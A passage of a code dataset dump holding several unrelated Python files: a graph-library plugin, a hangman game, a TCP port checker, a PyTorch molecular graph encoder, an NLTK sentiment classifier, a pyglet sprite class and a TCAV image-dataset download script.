index_to_label = community_louvain.best_partition(graph.value)\n modularity_score = community_louvain.modularity(index_to_label, graph.value)\n return (\n PythonNodeMap(index_to_label,),\n modularity_score,\n )\n\n\nif has_networkx and has_pandas:\n from ..pandas.types import PandasEdgeSet, PandasEdgeMap\n from ..python.types import PythonNodeMap, PythonNodeSet\n\n @concrete_algorithm(\"util.graph.build\")\n def nx_graph_build_from_pandas(\n edges: mg.Union[PandasEdgeSet, PandasEdgeMap],\n nodes: 
mg.Optional[mg.Union[PythonNodeSet, PythonNodeMap]],\n ) -> NetworkXGraph:\n g = nx.DiGraph() if edges.is_directed else nx.Graph()\n if nodes is not None:\n if type(nodes) is PythonNodeMap:\n g.add_nodes_from((n, {\"weight\": v}) for n, v in nodes.value.items())\n else:\n g.add_nodes_from(nodes.value)\n if type(edges) is PandasEdgeMap:\n df = edges.value[[edges.src_label, edges.dst_label, edges.weight_label]]\n g.add_weighted_edges_from(df.itertuples(index=False, name=\"WeightedEdge\"))\n else:\n df = edges.value[[edges.src_label, edges.dst_label]]\n g.add_edges_from(df.itertuples(index=False, name=\"Edge\"))\n return NetworkXGraph(g)\n","sub_path":"metagraph/plugins/networkx/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":9926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177515860","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nx0 = 5 #[fm]\r\na = 1 #[fm]\r\nk = 1.38 #[fm]^(-1)\r\n\r\nA = (1./(2*np.pi*a**2))**(1./4)\r\n\r\ndef psi(x):\r\n abs_square = A**2*np.exp(-(x-x0)**2/(2.*a**2))\r\n return abs_square\r\n\r\nn = 100\r\nx = np.linspace(0,2*x0,n)\r\n\r\nplt.plot(x,psi(x))\r\nplt.xlabel('x [fm]'); plt.ylabel('$|\\\\Psi(x,0)|^2$')\r\nplt.title('Probability density')\r\nplt.show()\r\n\r\nhbar = 6.582e-16\r\nprint (k*1e15)**2*hbar**2/(2*3.727e9/(3e8)**2)\r\n","sub_path":"2a.py","file_name":"2a.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585411150","text":"import random\n\n# library that we use in order to choose\n\nname = input(\"What is your name? \")\n# Here the user is asked to enter the name first\nprint(\"Good Luck ! \", name)\n\nwords = []\nn = int(input(\"How many words do you want to work with? 
\"))\n# iterating till the range\nfor i in range(0, n):\n print(\"Enter word No-{}: \".format(i+1))\n elm = str(input())\n words.append(elm) # adding the element\n\n# Function will choose one random\n# word from this list of words\nword = random.choice(words)\n\nprint(\"Guess the characters of one the words you choose\")\n\nguesses = ''\nturns = int(n - 1)\n\nwhile turns > 0:\n\n # counts the number of times a user fails\n failed = 0\n\n # all characters from the input\n # word taking one at a time.\n for char in word:\n\n # comparing that character with\n # the character in guesses\n if char in guesses:\n print(char)\n\n else:\n print(\"\")\n\n # for every failure 1 will be\n # incremented in failure\n failed += 1\n\n if failed == 0:\n # user will win the game if failure is 0\n # and 'You Win' will be given as output\n print(\"You Win\")\n\n # this print the correct word\n print(\"The word is: \", word)\n break\n\n # if user has input the wrong alphabet then\n # it will ask user to enter another alphabet\n guess = input(\"guess a character:\")\n\n # every input character will be stored in guesses\n guesses += guess\n\n # check input with the character in word\n if guess not in word:\n\n turns -= 1\n\n # if the character doesn’t match the word\n # then “Wrong” will be given as output\n print(\"Wrong\")\n\n # this will print the number of\n # turns left for the user\n print(\"You have\", + turns, 'more guesses')\n\n if turns == 0:\n print(\"You Loose\")\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23032573","text":"import socket\nfrom collections import namedtuple\nfrom .mylog import log\n\nEndpointInfo = namedtuple(\"EndpointInfo\", field_names=[\"host\", \"port\", \"timeout\"])\n\ndef print_endpoint(endpoint):\n return \"{0:s}:{1:d}\".format(endpoint.host, endpoint.port)\n\nTCPInfo = namedtuple(\"TCPInfo\", field_names=[\"endpoint\", \"success\", \"message\"])\n\ndef monitor(endpoint):\n log.debug(\"Creating a TCP connection for monitoring the endpoint %s\",\n print_endpoint(endpoint))\n try:\n sock = socket.create_connection((endpoint.host, endpoint.port), endpoint.timeout)\n log.info(\"Successfully connected to the endpoint %s\",\n print_endpoint(endpoint))\n return TCPInfo(endpoint=endpoint,\n success=True,\n message=\"{0:s} is listening\".format(print_endpoint(endpoint)))\n except Exception as e:\n log.warning(\"Could not connect to the endpoint %s: %s\",\n print_endpoint(endpoint),\n str(e))\n return TCPInfo(endpoint=endpoint,\n success=False,\n message=\"{0:s} {1:s}\".format(print_endpoint(endpoint), str(e)))\n finally:\n try:\n log.debug(\"Closing the TCP connection\")\n sock.close()\n except:\n pass\n\n","sub_path":"src/checker/tcpmonitor.py","file_name":"tcpmonitor.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33065616","text":"#!/usr/bin/env python3\nimport sys\nimport os\n\n__license__ = \"MIT\"\n__copyright__ = \"Northern.tech\"\n\ndef user_error(msg):\n print(\"Error: {}\".format(msg))\n sys.exit(1)\n\n\nfunctions = {\"strcmp\": [\"int\", \"char *\", \"char *\"],\n \"strncmp\": [\"int\", \"char *\", \"char *\", \"size_t\"]}\n\ntemplate = r\"\"\"\n#include \n#include \n\nint main(void)\n{open}\n {return_type} r = {func}({args});\n printf(\"{func}({args_escaped}) -> {return_fmt}\\n\", r);\n return 0;\n{close}\n\"\"\"\n\n\ndef 
format_value(c_type, value):\n if c_type in [\"int\", \"size_t\"]:\n return \"%d\", str(value)\n elif c_type == \"char *\":\n return \"%s\", '\"' + str(value) + '\"'\n elif c_type == \"char\":\n return \"%c\", \"'\" + str(value) + \"'\"\n raise AssertionError\n\n\ndef fmt(c_type):\n f, v = format_value(c_type, 1)\n return f\n\n\ndef c_source_gen(func, args):\n if func not in functions:\n user_error(\"Unrecognized function - {}\".format(func))\n prototype = functions[func]\n if len(prototype) != len(args) + 1:\n user_error(\"Incorrect number of function arguments\")\n\n return_type = prototype[0]\n return_fmt = fmt(return_type)\n c_types = prototype[1:]\n values = []\n formats = []\n for arg, c_type in zip(args, c_types):\n f, v = format_value(c_type, arg)\n values.append(v)\n formats.append(f)\n args = \", \".join(values)\n source = template\n source = source.format(\n return_type=return_type,\n func=func,\n args=args,\n args_escaped=args.replace('\"', r'\\\"'),\n return_fmt=return_fmt,\n open=\"{\",\n close=\"}\")\n # print(source)\n return source\n\n\ndef c_generate_compile_run(func, args):\n source = c_source_gen(func, args)\n with open(\"tmp.c\", \"w\") as f:\n f.write(source)\n os.system(\"gcc tmp.c -o tmp && ./tmp\")\n\n\ndef main():\n argv = sys.argv\n func = None\n args = None\n if not argv[0].endswith(\"/c\"):\n func = argv[0].split(\"/\")[-1]\n args = argv[1:]\n elif len(argv) > 1:\n func = argv[1]\n args = argv[2:]\n else:\n user_error(\"Too few arguments\")\n\n # print(\"{}({})\".format(func, \", \".join(args)))\n return c_generate_compile_run(func, args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"451769803","text":"\"\"\"\nConfiguration\n基础设置\n\"\"\"\nimport os\n\nDEBUG = False\n# 文件根目录\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 资源目录\nRESOURCES_DIR = os.path.join(BASE_DIR, 'resources')\nIMG_DIRS = [\n os.path.join(RESOURCES_DIR, 'img'),\n]\nFONT_DIRS = [\n os.path.join(RESOURCES_DIR, 'fonts'),\n]\nDEFAULT_FONT = 'hallo-sans.otf'\n","sub_path":"Final_work/Game/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505171141","text":"def func_print_star(in_num=0):\n if in_num >= 1 and in_num <= 100:\n variable = [\"*\"*x for x in range(1, in_num+1)]\n for value in variable:\n print(value)\n else:\n print(\"in_num 범위가 아닙니다.\")\n\ndef func_main():\n a = int(input())\n func_print_star(a)\n\nif __name__ == '__main__':\n func_main()\n","sub_path":"Step/3_problem_11/step_3_9_2438.py","file_name":"step_3_9_2438.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293876198","text":"import torch\nimport torch.nn as nn\nimport rdkit.Chem as Chem\nimport torch.nn.functional as F\nfrom .nnutils import *\nfrom .mol_graph import MolGraph\nfrom .rnn import GRU, LSTM\n\nimport numpy as np\n\nclass MPNEncoder(nn.Module):\n\n def __init__(self, rnn_type, input_size, node_fdim, hidden_size, depth, dropout):\n super(MPNEncoder, self).__init__()\n self.hidden_size = hidden_size\n self.input_size = input_size\n self.depth = depth\n self.W_o = nn.Sequential( \n nn.Linear(node_fdim + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n\n if rnn_type == 
'GRU':\n self.rnn = GRU(input_size, hidden_size, depth) \n elif rnn_type == 'LSTM':\n self.rnn = LSTM(input_size, hidden_size, depth) \n else:\n raise ValueError('unsupported rnn cell type ' + rnn_type)\n\n def forward(self, fnode, fmess, agraph, bgraph):\n h = self.rnn(fmess, bgraph)\n h = self.rnn.get_hidden_state(h)\n nei_message = index_select_ND(h, 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n node_hiddens = self.W_o(node_hiddens)\n\n mask = torch.ones(node_hiddens.size(0), 1, device=fnode.device)\n mask[0, 0] = 0 #first node is padding\n return node_hiddens * mask, h #return only the hidden state (different from IncMPNEncoder in LSTM case)\n\nclass HierMPNEncoder(nn.Module):\n\n def __init__(self, vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout):\n super(HierMPNEncoder, self).__init__()\n self.vocab = vocab\n self.hidden_size = hidden_size\n self.dropout = dropout\n self.atom_size = atom_size = avocab.size()\n self.bond_size = bond_size = len(MolGraph.BOND_LIST) + MolGraph.MAX_POS\n\n self.E_c = nn.Sequential(\n nn.Embedding(vocab.size()[0], embed_size),\n nn.Dropout(dropout)\n )\n self.E_i = nn.Sequential(\n nn.Embedding(vocab.size()[1], embed_size),\n nn.Dropout(dropout)\n )\n self.W_c = nn.Sequential( \n nn.Linear(embed_size + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n self.W_i = nn.Sequential( \n nn.Linear(embed_size + hidden_size, hidden_size), \n nn.ReLU(),\n nn.Dropout(dropout)\n )\n\n self.E_a = torch.eye(atom_size).cuda()\n self.E_b = torch.eye( len(MolGraph.BOND_LIST) ).cuda()\n self.E_apos = torch.eye( MolGraph.MAX_POS ).cuda()\n self.E_pos = torch.eye( MolGraph.MAX_POS ).cuda()\n\n self.W_root = nn.Sequential( \n nn.Linear(hidden_size * 2, hidden_size), \n nn.Tanh() #root activation is tanh\n )\n self.tree_encoder = MPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.inter_encoder = MPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.graph_encoder = MPNEncoder(rnn_type, atom_size + bond_size, atom_size, hidden_size, depthG, dropout)\n\n def tie_embedding(self, other):\n self.E_c, self.E_i = other.E_c, other.E_i\n self.E_a, self.E_b = other.E_a, other.E_b\n \n def embed_inter(self, tree_tensors, hatom):\n fnode, fmess, agraph, bgraph, cgraph, _ = tree_tensors\n finput = self.E_i(fnode[:, 1])\n\n hnode = index_select_ND(hatom, 0, cgraph).sum(dim=1)\n hnode = self.W_i( torch.cat([finput, hnode], dim=-1) )\n\n hmess = hnode.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph\n\n def embed_tree(self, tree_tensors, hinter):\n fnode, fmess, agraph, bgraph, cgraph, _ = tree_tensors\n finput = self.E_c(fnode[:, 0])\n hnode = self.W_c( torch.cat([finput, hinter], dim=-1) )\n\n hmess = hnode.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph\n \n def embed_graph(self, graph_tensors):\n fnode, fmess, agraph, bgraph, _ = graph_tensors\n hnode = self.E_a.index_select(index=fnode, dim=0)\n fmess1 = hnode.index_select(index=fmess[:, 0], dim=0)\n fmess2 = self.E_b.index_select(index=fmess[:, 2], dim=0)\n fpos = self.E_apos.index_select(index=fmess[:, 3], dim=0)\n hmess = torch.cat([fmess1, fmess2, fpos], dim=-1)\n return 
hnode, hmess, agraph, bgraph\n\n def embed_root(self, hmess, tree_tensors, roots):\n roots = tree_tensors[2].new_tensor(roots) \n fnode = tree_tensors[0].index_select(0, roots)\n agraph = tree_tensors[2].index_select(0, roots)\n\n nei_message = index_select_ND(hmess, 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n return self.W_root(node_hiddens)\n\n def forward(self, tree_tensors, graph_tensors):\n# print('graph shape:',np.shape(graph_tensors[0]),np.shape(graph_tensors[1]),np.shape(graph_tensors[2]),np.shape(graph_tensors[3]),np.shape(graph_tensors[4]))\n tensors = self.embed_graph(graph_tensors)\n hatom,_ = self.graph_encoder(*tensors)\n\n tensors = self.embed_inter(tree_tensors, hatom)\n hinter,_ = self.inter_encoder(*tensors)\n\n tensors = self.embed_tree(tree_tensors, hinter)\n hnode,hmess = self.tree_encoder(*tensors)\n hroot = self.embed_root(hmess, tensors, [st for st,le in tree_tensors[-1]])\n\n return hroot, hnode, hinter, hatom\n\nclass IncMPNEncoder(MPNEncoder):\n\n def __init__(self, rnn_type, input_size, node_fdim, hidden_size, depth, dropout):\n super(IncMPNEncoder, self).__init__(rnn_type, input_size, node_fdim, hidden_size, depth, dropout)\n\n def forward(self, tensors, h, num_nodes, subset):\n fnode, fmess, agraph, bgraph = tensors\n subnode, submess = subset\n\n if len(submess) > 0: \n h = self.rnn.sparse_forward(h, fmess, submess, bgraph)\n\n nei_message = index_select_ND(self.rnn.get_hidden_state(h), 0, agraph)\n nei_message = nei_message.sum(dim=1)\n node_hiddens = torch.cat([fnode, nei_message], dim=1)\n node_hiddens = self.W_o(node_hiddens)\n\n node_buf = torch.zeros(num_nodes, self.hidden_size, device=fmess.device)\n node_hiddens = index_scatter(node_hiddens, node_buf, subnode)\n return node_hiddens, h\n\nclass IncHierMPNEncoder(HierMPNEncoder):\n\n def __init__(self, vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout):\n super(IncHierMPNEncoder, self).__init__(vocab, avocab, rnn_type, embed_size, hidden_size, depthT, depthG, dropout)\n self.tree_encoder = IncMPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.inter_encoder = IncMPNEncoder(rnn_type, hidden_size + MolGraph.MAX_POS, hidden_size, hidden_size, depthT, dropout)\n self.graph_encoder = IncMPNEncoder(rnn_type, self.atom_size + self.bond_size, self.atom_size, hidden_size, depthG, dropout)\n del self.W_root\n\n def get_sub_tensor(self, tensors, subset):\n subnode, submess = subset\n fnode, fmess, agraph, bgraph = tensors[:4]\n fnode, fmess = fnode.index_select(0, subnode), fmess.index_select(0, submess)\n agraph, bgraph = agraph.index_select(0, subnode), bgraph.index_select(0, submess)\n\n if len(tensors) == 6:\n cgraph = tensors[4].index_select(0, subnode)\n return fnode, fmess, agraph, bgraph, cgraph, tensors[-1]\n else:\n return fnode, fmess, agraph, bgraph, tensors[-1]\n\n def embed_sub_tree(self, tree_tensors, hinput, subtree, is_inter_layer):\n subnode, submess = subtree\n num_nodes = tree_tensors[0].size(0)\n fnode, fmess, agraph, bgraph, cgraph, _ = self.get_sub_tensor(tree_tensors, subtree)\n\n if is_inter_layer:\n finput = self.E_i(fnode[:, 1])\n hinput = index_select_ND(hinput, 0, cgraph).sum(dim=1)\n hnode = self.W_i( torch.cat([finput, hinput], dim=-1) )\n else:\n finput = self.E_c(fnode[:, 0])\n hinput = hinput.index_select(0, subnode)\n hnode = self.W_c( torch.cat([finput, hinput], dim=-1) )\n\n if len(submess) == 0:\n hmess = fmess\n else:\n node_buf = 
torch.zeros(num_nodes, self.hidden_size, device=fmess.device)\n node_buf = index_scatter(hnode, node_buf, subnode)\n hmess = node_buf.index_select(index=fmess[:, 0], dim=0)\n pos_vecs = self.E_pos.index_select(0, fmess[:, 2])\n hmess = torch.cat( [hmess, pos_vecs], dim=-1 ) \n return hnode, hmess, agraph, bgraph \n\n def forward(self, tree_tensors, inter_tensors, graph_tensors, htree, hinter, hgraph, subtree, subgraph):\n num_tree_nodes = tree_tensors[0].size(0)\n num_graph_nodes = graph_tensors[0].size(0)\n\n if len(subgraph[0]) + len(subgraph[1]) > 0:\n sub_graph_tensors = self.get_sub_tensor(graph_tensors, subgraph)[:-1] #graph tensor is already embedded\n hgraph.node, hgraph.mess = self.graph_encoder(sub_graph_tensors, hgraph.mess, num_graph_nodes, subgraph)\n\n if len(subtree[0]) + len(subtree[1]) > 0:\n sub_inter_tensors = self.embed_sub_tree(inter_tensors, hgraph.node, subtree, is_inter_layer=True)\n hinter.node, hinter.mess = self.inter_encoder(sub_inter_tensors, hinter.mess, num_tree_nodes, subtree)\n\n sub_tree_tensors = self.embed_sub_tree(tree_tensors, hinter.node, subtree, is_inter_layer=False)\n htree.node, htree.mess = self.tree_encoder(sub_tree_tensors, htree.mess, num_tree_nodes, subtree)\n\n return htree, hinter, hgraph\n\n","sub_path":"g2g_optimization/hgraph/.ipynb_checkpoints/encoder-checkpoint.py","file_name":"encoder-checkpoint.py","file_ext":"py","file_size_in_byte":10078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"248172471","text":"from nltk.corpus import stopwords\nfrom nltk import pos_tag\nfrom nltk.stem import WordNetLemmatizer\nimport string\nfrom nltk.corpus import movie_reviews\nimport random\nfrom nltk.corpus import wordnet\nimport nltk\n\n\ndef loading():\n # print(movie_reviews.categories())\n # print(movie_reviews.fileids())\n documents=[]\n for i in movie_reviews.categories():\n for j in movie_reviews.fileids():\n documents.append((movie_reviews.words(j),i))\n # print(documents[0:5])\n random.shuffle(documents)\n return documents\n\n\ndef pos_to_wordnet(pos_tag):\n # print(pos_tag)\n if pos_tag.startswith('J'):\n return wordnet.ADJ\n elif pos_tag.startswith('N'):\n return wordnet.NOUN\n elif pos_tag.startswith('V'):\n return wordnet.VERB\n elif pos_tag.startswith('R'):\n return wordnet.ADV\n else:\n return wordnet.NOUN\n\n\ndef cleaning_words(words):\n word_array=[]\n lemmatizer = WordNetLemmatizer()\n stop_words = stopwords.words('english')\n punctuations = list(string.punctuation)\n stop_words += punctuations\n for i in range(len(words)):\n if words[i] in stop_words:\n continue\n else:\n pos_tuple_returned=pos_tag([words[i]])\n word=lemmatizer.lemmatize(words[i],pos=pos_to_wordnet(pos_tuple_returned[0][1]))\n word_array.append(word)\n return word_array\n\n\ndef cleaning_file(document):\n cleaned_words=[]\n for i in range(len(document)):\n new_array=cleaning_words(document[i][0])\n print(new_array)\n cleaned_words.append((new_array,document[i][1]))\n return cleaned_words\n\ndef finding_features(document):\n feature_words=[]\n for i in range(len(document)):\n feature_words.extend(document[i][0])\n freq= nltk.FreqDist(feature_words)\n top_words_tuple=freq.most_common(3000)\n top_words=[i[0] for i in top_words_tuple]\n print(top_words)\n return top_words\n\n\ndef creating_dictionary_single_file(top_words,words):\n dict={}\n for i in range(len(words)):\n if words[i] in top_words:\n dict[words[i]] = True\n else:\n continue\n return dict\n\ndef creating_dictionary(top_words,document):\n 
feature_set=[]\n for i in range(len(document)):\n dict=creating_dictionary_single_file(top_words,document[i][0])\n feature_set.append((dict,document[i][1]))\n\n return feature_set\n\nfrom sklearn.svm import SVC\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n\n\ndocument=loading()\nprint(document)\ncleaned_words=cleaning_file(document)\nx_y_train, x_y_test=cleaned_words[0:1500],cleaned_words[1500:]\ntop_words=finding_features(x_y_train)\nfeature_set=creating_dictionary(top_words,x_y_train)\ntest_set=creating_dictionary(top_words,x_y_test)\nfrom nltk import NaiveBayesClassifier\nclassifier=NaiveBayesClassifier.train(feature_set)\nprint(nltk.classify.accuracy(classifier,test_set))\nprint(classifier.show_most_informative_features(15))\n\n\nsvm=SVC()\nclassifier_sklearn=SklearnClassifier(svm)\nrandom_forest=RandomForestClassifier()\nclassifier_sklearn_1=SklearnClassifier(random_forest)\n\n\nclassifier_sklearn.train(feature_set)\nnltk.classify.accuracy(classifier_sklearn,test_set)\n\n\nclassifier_sklearn_1.train(feature_set)\nnltk.classify.accuracy(classifier_sklearn_1,test_set)\n\n\n","sub_path":"Natural_Language_Processing/f-02.py","file_name":"f-02.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355533797","text":"import pyglet\n\nclass AnimatedSprite(pyglet.sprite.Sprite):\n ''' Sprite subclass providing advanced\n playback controls for animated sprites '''\n\n def __init__(self,\n img, x=0, y=0,\n blend_src=pyglet.gl.GL_SRC_ALPHA,\n blend_dest=pyglet.gl.GL_ONE_MINUS_SRC_ALPHA,\n batch=None,\n group=None,\n usage='dynamic'):\n pyglet.sprite.Sprite.__init__(self, img, x, y, blend_src, blend_dest, batch, group, usage)\n\n self._paused = False\n self._range = (0, 1)\n\n def _animate(self, dt):\n self._frame_index += 1\n if self._frame_index >= self.range[1]:\n self._frame_index = self.range[0]\n self.dispatch_event('on_animation_end')\n\n frame = self._animation.frames[self._frame_index]\n self._set_texture(frame.image.get_texture())\n\n if frame.duration != None:\n pyglet.clock.schedule_once(self._animate, frame.duration)\n else:\n self.dispatch_event('on_animation_end')\n\n def set_frame(self, i):\n ''' Seek to the specified frame '''\n self._frame_index = max(self.range[0], min(self.range[1], i))\n frame = self._animation.frames[self._frame_index]\n\n pyglet.clock.unschedule(self._animate)\n self._animate(0.0)\n\n def set_loop(self, begin, end):\n ''' Loop between the begin and end frames '''\n\n self.range = (begin, end)\n\n if self._frame_index < begin:\n self._frame_index = begin-1\n\n pyglet.clock.unschedule(self._animate)\n self._animate(0.0)\n\n def pause(self):\n ''' pause animation playback '''\n if not self._paused:\n frame = self._animation.frames[self._frame_index]\n self._animate(frame.duration)\n pyglet.clock.unschedule(self._animate)\n self._paused = True\n\n def play(self):\n ''' resume animation playback '''\n if self._paused:\n frame = self._animation.frames[self._frame_index]\n self._animate(frame.duration)\n self._paused = False","sub_path":"map/animatedsprite.py","file_name":"animatedsprite.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407689261","text":"\"\"\"\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with 
the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\"\"\" Downloads models and datasets for imagenet\n\n Content downloaded:\n - Imagenet images for the zebra class.\n - Full Broden dataset(http://netdissect.csail.mit.edu/)\n - Inception 5h model(https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/inception5h.py)\n - Mobilenet V2 model(https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet_v1.md)\n\n Functionality:\n - Downloads open source models(Inception and Mobilenet)\n - Downloads the zebra class from imagenet, to illustrate a target class\n - Extracts three concepts from the Broden dataset(striped, dotted, zigzagged)\n - Structures the data in a format that can be readily used by TCAV\n - Creates random folders with examples from Imagenet. Those are used by TCAV.\n\n Example usage:\n\n python download_and_make_datasets.py --source_dir=YOUR_FOLDER --number_of_images_per_folder=50 --number_of_random_folders=10\n\"\"\"\nimport subprocess\nimport os\nimport argparse\nfrom tensorflow.io import gfile\nimport imagenet_and_broden_fetcher as fetcher\nimport tensorflow as tf\nimport logging\n\ndef make_concepts_targets_and_randoms(source_dir, number_of_images_per_folder, number_of_random_folders):\n \n logging.basicConfig(filename=source_dir+'/logger.log', level=logging.INFO)\n \n # Run script to download data to source_dir\n if not gfile.exists(source_dir):\n gfile.makedirs(source_dir)\n if not gfile.exists(os.path.join(source_dir,'broden1_224/')) or not gfile.exists(os.path.join(source_dir,'inception5h')):\n subprocess.call(['bash' , 'FetchDataAndModels.sh', source_dir])\n \n \n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n all_class = imagenet_dataframe[\"class_name\"].values.tolist()\n\n # Determine classes that we will fetch\n imagenet_classes = ['fire engine']\n broden_concepts = ['striped', 'dotted', 'zigzagged']\n random_except_concepts = ['zebra','fire engine']\n except_words = ['cat', 'shark', 'apron', 'dogsled','dumbbell','ball','bus']\n for e_word in except_words:\n random_except_concepts.extend([element for element in all_class if e_word == str(element)[-len(e_word):]])\n \n tf.logging.info('imagenet_classe %s' % imagenet_classes)\n tf.logging.info('concepts %s' % broden_concepts)\n tf.logging.info('random_except_concepts %s' % random_except_concepts)\n\n for image in imagenet_classes:\n fetcher.fetch_imagenet_class(source_dir, image, number_of_images_per_folder, imagenet_dataframe)\n # Make concepts from broden\n for concept in broden_concepts:\n fetcher.download_texture_to_working_folder(broden_path=os.path.join(source_dir, 'broden1_224'),\n saving_path=source_dir,\n texture_name=concept,\n number_of_images=number_of_images_per_folder)\n\n # Make random folders. 
If we want to run N random experiments with tcav, we need N+1 folders.\n # (変更) 除外するクラスを指定\n fetcher.generate_random_folders(\n working_directory=source_dir,\n random_folder_prefix=\"random500\",\n number_of_random_folders=number_of_random_folders+1,\n number_of_examples_per_folder=number_of_images_per_folder,\n imagenet_dataframe=imagenet_dataframe,\n random_except_concepts = random_except_concepts\n )\n\ndef make_targets(source_dir, number_of_images_per_folder):\n\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n all_class = imagenet_dataframe[\"class_name\"].values.tolist()\n\n # Determine classes that we will fetch\n imagenet_classes = ['soccer ball']\n\n for image in imagenet_classes:\n fetcher.fetch_imagenet_class(source_dir, image, number_of_images_per_folder, imagenet_dataframe)\n\n\ndef make_randoms(source_dir, number_of_images_per_folder, number_of_random_folders):\n\n logging.basicConfig(filename=source_dir+'/logger.log', level=logging.INFO)\n\n # Run script to download data to source_dir\n if not gfile.exists(source_dir):\n gfile.makedirs(source_dir)\n if not gfile.exists(os.path.join(source_dir,'broden1_224/')) or not gfile.exists(os.path.join(source_dir,'inception5h')):\n subprocess.call(['bash' , 'FetchDataAndModels.sh', source_dir])\n\n\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n\n # Make random folders. If we want to run N random experiments with tcav, we need N+1 folders.\n fetcher.generate_random_folders(\n working_directory=source_dir,\n random_folder_prefix=\"random50\",\n number_of_random_folders=number_of_random_folders+1,\n number_of_examples_per_folder=number_of_images_per_folder,\n imagenet_dataframe=imagenet_dataframe\n )\n\n\ndef make_imagent_color_concept(source_dir, number_of_images_per_folder):\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n color_lst = ['red','yellow','blue','green']\n fetcher.fetch_imagenet_class_color(source_dir,\n number_of_images_per_folder,\n imagenet_dataframe,\n folder_prefix=\"imagenet\",\n color_lst=color_lst\n )\n\ndef make_imagent_fix_color_concept(source_dir, number_of_images_per_folder):\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n color_lst = ['red','yellow','blue','green','purple']\n #color_lst = ['purple']\n fetcher.fetch_imagenet_class_color_fixed(source_dir,\n number_of_images_per_folder,\n imagenet_dataframe,\n folder_prefix=\"imagenet\",\n color_lst=color_lst\n )\n\n\nif __name__ == '__main__':\n tf.get_logger().setLevel('INFO')\n parser = argparse.ArgumentParser(description='Create examples and concepts folders.')\n parser.add_argument('--source_dir', type=str,\n help='Name for the directory where we will create the data.')\n parser.add_argument('--number_of_images_per_folder', type=int,\n help='Number of images to be included in each folder')\n parser.add_argument('--number_of_random_folders', type=int,\n help='Number of folders with random examples that we will generate for tcav')\n\n args = parser.parse_args()\n # create folder if it doesn't exist\n if not gfile.exists(args.source_dir):\n 
